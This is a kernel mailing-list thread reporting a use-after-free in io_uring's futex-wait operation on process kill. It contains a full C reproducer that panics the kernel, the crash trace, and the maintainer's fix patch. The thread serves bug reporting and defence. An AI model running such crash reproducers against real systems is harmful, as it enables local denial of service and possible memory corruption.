public inbox for io-uring@vger.kernel.org
* use-after-free if killed while in IORING_OP_FUTEX_WAIT
@ 2025-06-04 13:58 rtm
  2025-06-04 14:12 ` Jens Axboe
  0 siblings, 1 reply; 3+ messages in thread
From: rtm @ 2025-06-04 13:58 UTC (permalink / raw)
  To: Jens Axboe, Pavel Begunkov, io-uring

[-- Attachment #1: Type: text/plain, Size: 2033 bytes --]

If a process is killed while in IORING_OP_FUTEX_WAIT, do_exit()'s call
to exit_mm() causes the futex_private_hash to be freed, along with its
buckets' locks, while the io_uring request still exists. When (a little
later in do_exit()) the io_uring fd is fput(), the resulting
futex_unqueue() tries to use the freed memory that
req->async_data->lock_ptr points to.

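For context, here is a minimal liburing sketch of the same blocking futex
wait (this assumes liburing 2.5+ and its io_uring_prep_futex_wait()
helper; the raw-syscall demo attached below is what actually reproduces
the crash):

/* build (assuming liburing is installed): cc -o futexwait futexwait.c -luring */
#include <liburing.h>
#include <linux/futex.h>
#include <stdint.h>
#include <stdio.h>

int main(void)
{
    struct io_uring ring;
    struct io_uring_cqe *cqe;
    uint32_t futex_word = 0;    /* equals the expected value, so the wait blocks */

    if (io_uring_queue_init(1, &ring, 0) < 0) {
        fprintf(stderr, "io_uring_queue_init failed\n");
        return 1;
    }

    struct io_uring_sqe *sqe = io_uring_get_sqe(&ring);
    /* private 32-bit futex: the wait goes through the per-process futex hash */
    io_uring_prep_futex_wait(sqe, &futex_word, 0, FUTEX_BITSET_MATCH_ANY,
                             FUTEX2_SIZE_U32 | FUTEX2_PRIVATE, 0);
    io_uring_submit(&ring);

    /* blocks here; SIGKILL this process to exercise the exit path */
    io_uring_wait_cqe(&ring, &cqe);
    return 0;
}
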
I've attached a demo:

# cc uring46b.c
# ./a.out
killing child
BUG: spinlock bad magic on CPU#0, kworker/u4:1/26
Unable to handle kernel paging request at virtual address 6b6b6b6b6b6b711b
Current kworker/u4:1 pgtable: 4K pagesize, 39-bit VAs, pgdp=0x000000008202a000
[6b6b6b6b6b6b711b] pgd=0000000000000000, p4d=0000000000000000, pud=0000000000000000
Oops [#1]
Modules linked in:
CPU: 0 UID: 0 PID: 26 Comm: kworker/u4:1 Not tainted 6.15.0-11192-ga82d78bc13a8 #553 NONE 
Hardware name: riscv-virtio,qemu (DT)
Workqueue: iou_exit io_ring_exit_work
epc : spin_dump+0x38/0x6e
 ra : spin_dump+0x30/0x6e
epc : ffffffff80003354 ra : ffffffff8000334c sp : ffffffc600113b60
...
status: 0000000200000120 badaddr: 6b6b6b6b6b6b711b cause: 000000000000000d
[<ffffffff80003354>] spin_dump+0x38/0x6e
[<ffffffff8009b78a>] do_raw_spin_lock+0x10a/0x126
[<ffffffff811e6552>] _raw_spin_lock+0x1a/0x22
[<ffffffff800eb80c>] futex_unqueue+0x2a/0x76
[<ffffffff8069e366>] __io_futex_cancel+0x72/0x88
[<ffffffff806982fe>] io_cancel_remove_all+0x50/0x74
[<ffffffff8069e4ac>] io_futex_remove_all+0x1a/0x22
[<ffffffff80010a7e>] io_uring_try_cancel_requests+0x2e2/0x36e
[<ffffffff80010bf6>] io_ring_exit_work+0xec/0x3f0
[<ffffffff80057f0a>] process_one_work+0x132/0x2fe
[<ffffffff8005888c>] worker_thread+0x21e/0x2fe
[<ffffffff80060428>] kthread+0xe8/0x1ba
[<ffffffff80022fb0>] ret_from_fork_kernel+0xe/0x5e
[<ffffffff811e8566>] ret_from_fork_kernel_asm+0x16/0x18
Code: 4517 018b 0513 ca05 00ef 3b60 2603 0049 2601 c491 (a703) 5b04 
---[ end trace 0000000000000000 ]---
Kernel panic - not syncing: Fatal exception
---[ end Kernel panic - not syncing: Fatal exception ]---

Robert Morris
rtm@mit.edu


[-- Attachment #2: uring46b.c --]
[-- Type: application/octet-stream, Size: 6211 bytes --]

#include <stdio.h>
#include <signal.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sys/uio.h>
#include <linux/fs.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <linux/io_uring.h>

int dirfd = -1;
int pfds[2];
int sock = -1;

//
// adapted from:
// https://unixism.net/loti/low_level.html
// https://github.com/shuveb/io_uring-by-example
//

#define QUEUE_DEPTH 1
#define BLOCK_SZ    1024

struct app_io_sq_ring {
    unsigned *head;
    unsigned *tail;
    unsigned *ring_mask;
    unsigned *ring_entries;
    unsigned *flags;
    unsigned *array;
};

struct app_io_cq_ring {
    unsigned *head;
    unsigned *tail;
    unsigned *ring_mask;
    unsigned *ring_entries;
    struct io_uring_cqe *cqes;
};

struct submitter {
    int ring_fd;
    struct app_io_sq_ring sq_ring;
    struct io_uring_sqe *sqes;
    struct app_io_cq_ring cq_ring;
};

struct file_info {
    off_t file_sz;
    struct iovec iovecs[];      /* Referred by readv/writev */
};

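/* thin wrappers around the raw io_uring syscalls (the demo does not use liburing) */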
int io_uring_setup(unsigned entries, struct io_uring_params *p)
{
    return (int) syscall(__NR_io_uring_setup, entries, p);
}

int io_uring_enter(int ring_fd, unsigned int to_submit,
                          unsigned int min_complete, unsigned int flags)
{
    return (int) syscall(__NR_io_uring_enter, ring_fd, to_submit, min_complete,
                   flags, NULL, 0);
}

int app_setup_uring(struct submitter *s) {
    struct app_io_sq_ring *sring = &s->sq_ring;
    struct app_io_cq_ring *cring = &s->cq_ring;
    struct io_uring_params p;
    void *sq_ptr, *cq_ptr;

    memset(&p, 0, sizeof(p));
    s->ring_fd = io_uring_setup(QUEUE_DEPTH, &p);
    if (s->ring_fd < 0) {
        perror("io_uring_setup");
        return 1;
    }

    int sring_sz = p.sq_off.array + p.sq_entries * sizeof(unsigned);
    int cring_sz = p.cq_off.cqes + p.cq_entries * sizeof(struct io_uring_cqe);

    if (p.features & IORING_FEAT_SINGLE_MMAP) {
        if (cring_sz > sring_sz) {
            sring_sz = cring_sz;
        }
        cring_sz = sring_sz;
    }

    sq_ptr = mmap(0, sring_sz, PROT_READ | PROT_WRITE, 
            MAP_SHARED | MAP_POPULATE,
            s->ring_fd, IORING_OFF_SQ_RING);
    if (sq_ptr == MAP_FAILED) {
        perror("mmap");
        return 1;
    }

    if (p.features & IORING_FEAT_SINGLE_MMAP) {
        cq_ptr = sq_ptr;
    } else {
        cq_ptr = mmap(0, cring_sz, PROT_READ | PROT_WRITE, 
                MAP_SHARED | MAP_POPULATE,
                s->ring_fd, IORING_OFF_CQ_RING);
        if (cq_ptr == MAP_FAILED) {
            perror("mmap");
            return 1;
        }
    }

    sring->head = sq_ptr + p.sq_off.head;
    sring->tail = sq_ptr + p.sq_off.tail;
    sring->ring_mask = sq_ptr + p.sq_off.ring_mask;
    sring->ring_entries = sq_ptr + p.sq_off.ring_entries;
    sring->flags = sq_ptr + p.sq_off.flags;
    sring->array = sq_ptr + p.sq_off.array;

    s->sqes = mmap(0, p.sq_entries * sizeof(struct io_uring_sqe),
            PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE,
            s->ring_fd, IORING_OFF_SQES);
    if (s->sqes == MAP_FAILED) {
        perror("mmap");
        return 1;
    }

    cring->head = cq_ptr + p.cq_off.head;
    cring->tail = cq_ptr + p.cq_off.tail;
    cring->ring_mask = cq_ptr + p.cq_off.ring_mask;
    cring->ring_entries = cq_ptr + p.cq_off.ring_entries;
    cring->cqes = cq_ptr + p.cq_off.cqes;

    return 0;
}

int submit_to_sq(char *file_path, struct submitter *s) {
    struct file_info *fi;

    int file_fd = open(file_path, O_RDONLY);
    if (file_fd < 0) {
        perror("open");
        return 1;
    }

    struct app_io_sq_ring *sring = &s->sq_ring;
    unsigned index = 0, current_block = 0, tail = 0, next_tail = 0;

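    /*
     * The file/iovec bookkeeping below is scaffolding carried over from the
     * readv example this demo was adapted from; only the futex-wait SQE
     * prepared further down matters for triggering the bug.
     */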
    off_t file_sz = 2;
    off_t bytes_remaining = file_sz;
    int blocks = (int) file_sz / BLOCK_SZ;
    if (file_sz % BLOCK_SZ) blocks++;

    fi = malloc(sizeof(*fi) + sizeof(struct iovec) * blocks);
    if (!fi) {
        fprintf(stderr, "Unable to allocate memory\n");
        return 1;
    }
    fi->file_sz = file_sz;

    while (bytes_remaining) {
        off_t bytes_to_read = bytes_remaining;
        if (bytes_to_read > BLOCK_SZ)
            bytes_to_read = BLOCK_SZ;

        fi->iovecs[current_block].iov_len = bytes_to_read;

        void *buf;
        if (posix_memalign(&buf, BLOCK_SZ, BLOCK_SZ)) {
            perror("posix_memalign");
            return 1;
        }
        fi->iovecs[current_block].iov_base = buf;

        current_block++;
        bytes_remaining -= bytes_to_read;
    }

    next_tail = tail = *sring->tail;
    next_tail++;
    index = tail & *s->sq_ring.ring_mask;
    struct io_uring_sqe *sqe = &s->sqes[index];
    sqe->flags = 0;
    sqe->off = 0;
    sring->array[index] = index;
    tail = next_tail;

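    /*
     * IORING_OP_FUTEX_WAIT field mapping (per io_futex_prep() in
     * io_uring/futex.c):
     *   addr   -> futex user address
     *   off    -> expected futex value (aliases addr2)
     *   optval -> futex mask (aliases addr3)
     *   fd     -> futex2 flags; 130 == FUTEX2_PRIVATE | FUTEX2_SIZE_U32,
     *             so the wait goes through the process-private futex hash
     */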
    sqe->len = 0;
    sqe->optval = 0x80000000;

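    /*
     * Futex word: the low 32 bits (the futex value on little-endian) are
     * zero and match the expected value in sqe->off, so the wait blocks
     * until the child is killed.
     */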
    static char buf[32];
    memset(buf, 0xff, sizeof(buf));
    *(long*)buf = 0xffffffff00000000;
    sqe->addr = (__u64) buf;

    sqe->opcode = IORING_OP_FUTEX_WAIT;
    sqe->flags = 2;
    sqe->fd = 130;

    if(*sring->tail != tail) {
        *sring->tail = tail;
    }

    int ret = io_uring_enter(s->ring_fd, 1, 1, IORING_ENTER_GETEVENTS);
    if(ret < 0) {
        perror("io_uring_enter");
        return 1;
    }

    return 0;
}

int
main()
{
  struct rlimit r;   
  r.rlim_cur = r.rlim_max = 0;
  setrlimit(RLIMIT_CORE, &r);

  unlink("z");
  system("echo hi > z");

  int pid = fork();
  if(pid == 0){
    struct submitter *s;

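    /*
     * The extra fds below (dirfd, socketpair, UDP socket) appear to be
     * incidental leftovers from the harness this demo was reduced from.
     */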
    dirfd = open(".", 0);

    socketpair(AF_UNIX, SOCK_STREAM, 0, pfds);
    write(pfds[0], "a", 1);
    write(pfds[1], "b", 1);

    sock = socket(AF_INET, SOCK_DGRAM, 0);
    
    s = malloc(sizeof(*s));
    if (!s) {
      perror("malloc");
      exit(0);
    }
    memset(s, 0, sizeof(*s));
    
    if(app_setup_uring(s)) {
      fprintf(stderr, "Unable to setup uring!\n");
      exit(0);
    }
    
    if(submit_to_sq("z", s)) {
      fprintf(stderr, "Error reading file z\n");
      exit(0);
    }

    printf("child exiting\n");
    exit(0);
  }

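  /*
   * Give the child time to block in IORING_OP_FUTEX_WAIT, then SIGKILL it.
   * The child's exit frees the private futex hash before the io_uring fd
   * is torn down, which triggers the use-after-free described above.
   */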
  sleep(1);
  printf("killing child\n");
  kill(pid, 9);
  usleep(200000);
}


* Re: use-after-free if killed while in IORING_OP_FUTEX_WAIT
  2025-06-04 13:58 use-after-free if killed while in IORING_OP_FUTEX_WAIT rtm
@ 2025-06-04 14:12 ` Jens Axboe
  2025-06-04 16:22   ` Jens Axboe
  0 siblings, 1 reply; 3+ messages in thread
From: Jens Axboe @ 2025-06-04 14:12 UTC (permalink / raw)
  To: rtm, Pavel Begunkov, io-uring

On 6/4/25 7:58 AM, rtm@csail.mit.edu wrote:
> If a process is killed while in IORING_OP_FUTEX_WAIT, do_exit()'s call
> to exit_mm() causes the futex_private_hash to be freed, along with its
> buckets' locks, while the io_uring request still exists. When (a little
> later in do_exit()) the io_uring fd is fput(), the resulting
> futex_unqueue() tries to use the freed memory that
> req->async_data->lock_ptr points to.
> 
> I've attached a demo:
> 
> # cc uring46b.c
> # ./a.out
> killing child
> BUG: spinlock bad magic on CPU#0, kworker/u4:1/26
> Unable to handle kernel paging request at virtual address 6b6b6b6b6b6b711b
> Current kworker/u4:1 pgtable: 4K pagesize, 39-bit VAs, pgdp=0x000000008202a000
> [6b6b6b6b6b6b711b] pgd=0000000000000000, p4d=0000000000000000, pud=0000000000000000
> Oops [#1]
> Modules linked in:
> CPU: 0 UID: 0 PID: 26 Comm: kworker/u4:1 Not tainted 6.15.0-11192-ga82d78bc13a8 #553 NONE 
> Hardware name: riscv-virtio,qemu (DT)
> Workqueue: iou_exit io_ring_exit_work
> epc : spin_dump+0x38/0x6e
>  ra : spin_dump+0x30/0x6e
> epc : ffffffff80003354 ra : ffffffff8000334c sp : ffffffc600113b60
> ...
> status: 0000000200000120 badaddr: 6b6b6b6b6b6b711b cause: 000000000000000d
> [<ffffffff80003354>] spin_dump+0x38/0x6e
> [<ffffffff8009b78a>] do_raw_spin_lock+0x10a/0x126
> [<ffffffff811e6552>] _raw_spin_lock+0x1a/0x22
> [<ffffffff800eb80c>] futex_unqueue+0x2a/0x76
> [<ffffffff8069e366>] __io_futex_cancel+0x72/0x88
> [<ffffffff806982fe>] io_cancel_remove_all+0x50/0x74
> [<ffffffff8069e4ac>] io_futex_remove_all+0x1a/0x22
> [<ffffffff80010a7e>] io_uring_try_cancel_requests+0x2e2/0x36e
> [<ffffffff80010bf6>] io_ring_exit_work+0xec/0x3f0
> [<ffffffff80057f0a>] process_one_work+0x132/0x2fe
> [<ffffffff8005888c>] worker_thread+0x21e/0x2fe
> [<ffffffff80060428>] kthread+0xe8/0x1ba
> [<ffffffff80022fb0>] ret_from_fork_kernel+0xe/0x5e
> [<ffffffff811e8566>] ret_from_fork_kernel_asm+0x16/0x18
> Code: 4517 018b 0513 ca05 00ef 3b60 2603 0049 2601 c491 (a703) 5b04 
> ---[ end trace 0000000000000000 ]---
> Kernel panic - not syncing: Fatal exception
> ---[ end Kernel panic - not syncing: Fatal exception ]---

Thanks, I'll take a look!

-- 
Jens Axboe



* Re: use-after-free if killed while in IORING_OP_FUTEX_WAIT
  2025-06-04 14:12 ` Jens Axboe
@ 2025-06-04 16:22   ` Jens Axboe
  0 siblings, 0 replies; 3+ messages in thread
From: Jens Axboe @ 2025-06-04 16:22 UTC (permalink / raw)
  To: rtm, Pavel Begunkov, io-uring

On 6/4/25 8:12 AM, Jens Axboe wrote:
> On 6/4/25 7:58 AM, rtm@csail.mit.edu wrote:
>> If a process is killed while in IORING_OP_FUTEX_WAIT, do_exit()'s call
>> to exit_mm() causes the futex_private_hash to be freed, along with its
>> buckets' locks, while the io_uring request still exists. When (a little
>> later in do_exit()) the io_uring fd is fput(), the resulting
>> futex_unqueue() tries to use the freed memory that
>> req->async_data->lock_ptr points to.
>>
>> I've attached a demo:
>>
>> # cc uring46b.c
>> # ./a.out
>> killing child
>> BUG: spinlock bad magic on CPU#0, kworker/u4:1/26
>> Unable to handle kernel paging request at virtual address 6b6b6b6b6b6b711b
>> Current kworker/u4:1 pgtable: 4K pagesize, 39-bit VAs, pgdp=0x000000008202a000
>> [6b6b6b6b6b6b711b] pgd=0000000000000000, p4d=0000000000000000, pud=0000000000000000
>> Oops [#1]
>> Modules linked in:
>> CPU: 0 UID: 0 PID: 26 Comm: kworker/u4:1 Not tainted 6.15.0-11192-ga82d78bc13a8 #553 NONE 
>> Hardware name: riscv-virtio,qemu (DT)
>> Workqueue: iou_exit io_ring_exit_work
>> epc : spin_dump+0x38/0x6e
>>  ra : spin_dump+0x30/0x6e
>> epc : ffffffff80003354 ra : ffffffff8000334c sp : ffffffc600113b60
>> ...
>> status: 0000000200000120 badaddr: 6b6b6b6b6b6b711b cause: 000000000000000d
>> [<ffffffff80003354>] spin_dump+0x38/0x6e
>> [<ffffffff8009b78a>] do_raw_spin_lock+0x10a/0x126
>> [<ffffffff811e6552>] _raw_spin_lock+0x1a/0x22
>> [<ffffffff800eb80c>] futex_unqueue+0x2a/0x76
>> [<ffffffff8069e366>] __io_futex_cancel+0x72/0x88
>> [<ffffffff806982fe>] io_cancel_remove_all+0x50/0x74
>> [<ffffffff8069e4ac>] io_futex_remove_all+0x1a/0x22
>> [<ffffffff80010a7e>] io_uring_try_cancel_requests+0x2e2/0x36e
>> [<ffffffff80010bf6>] io_ring_exit_work+0xec/0x3f0
>> [<ffffffff80057f0a>] process_one_work+0x132/0x2fe
>> [<ffffffff8005888c>] worker_thread+0x21e/0x2fe
>> [<ffffffff80060428>] kthread+0xe8/0x1ba
>> [<ffffffff80022fb0>] ret_from_fork_kernel+0xe/0x5e
>> [<ffffffff811e8566>] ret_from_fork_kernel_asm+0x16/0x18
>> Code: 4517 018b 0513 ca05 00ef 3b60 2603 0049 2601 c491 (a703) 5b04 
>> ---[ end trace 0000000000000000 ]---
>> Kernel panic - not syncing: Fatal exception
>> ---[ end Kernel panic - not syncing: Fatal exception ]---
> 
> Thanks, I'll take a look!

I think this would be the least intrusive fix, and also avoid fiddling
with mmget() for the PRIVATE case. I'll write a test case for this and
send it out as a real patch.


diff --git a/io_uring/futex.c b/io_uring/futex.c
index 383e0d99ad27..246bfb862db9 100644
--- a/io_uring/futex.c
+++ b/io_uring/futex.c
@@ -148,6 +148,8 @@ int io_futex_prep(struct io_kiocb *req, const struct io_uring_sqe *sqe)
 	    !futex_validate_input(iof->futex_flags, iof->futex_mask))
 		return -EINVAL;
 
+	/* Mark as inflight, so file exit cancelation will find it */
+	io_req_track_inflight(req);
 	return 0;
 }
 
@@ -194,6 +196,8 @@ int io_futexv_prep(struct io_kiocb *req, const struct io_uring_sqe *sqe)
 		return ret;
 	}
 
+	/* Mark as inflight, so file exit cancelation will find it */
+	io_req_track_inflight(req);
 	iof->futexv_unqueued = 0;
 	req->flags |= REQ_F_ASYNC_DATA;
 	req->async_data = ifd;
diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
index c7a9cecf528e..cf759c172083 100644
--- a/io_uring/io_uring.c
+++ b/io_uring/io_uring.c
@@ -408,7 +408,12 @@ static void io_clean_op(struct io_kiocb *req)
 	req->flags &= ~IO_REQ_CLEAN_FLAGS;
 }
 
-static inline void io_req_track_inflight(struct io_kiocb *req)
+/*
+ * Mark the request as inflight, so that file cancelation will find it.
+ * Can be used if the file is an io_uring instance, or if the request itself
+ * relies on ->mm being alive for the duration of the request.
+ */
+inline void io_req_track_inflight(struct io_kiocb *req)
 {
 	if (!(req->flags & REQ_F_INFLIGHT)) {
 		req->flags |= REQ_F_INFLIGHT;
diff --git a/io_uring/io_uring.h b/io_uring/io_uring.h
index 0ea7a435d1de..d59c12277d58 100644
--- a/io_uring/io_uring.h
+++ b/io_uring/io_uring.h
@@ -83,6 +83,7 @@ void io_add_aux_cqe(struct io_ring_ctx *ctx, u64 user_data, s32 res, u32 cflags)
 bool io_req_post_cqe(struct io_kiocb *req, s32 res, u32 cflags);
 void __io_commit_cqring_flush(struct io_ring_ctx *ctx);
 
+void io_req_track_inflight(struct io_kiocb *req);
 struct file *io_file_get_normal(struct io_kiocb *req, int fd);
 struct file *io_file_get_fixed(struct io_kiocb *req, int fd,
 			       unsigned issue_flags);

-- 
Jens Axboe

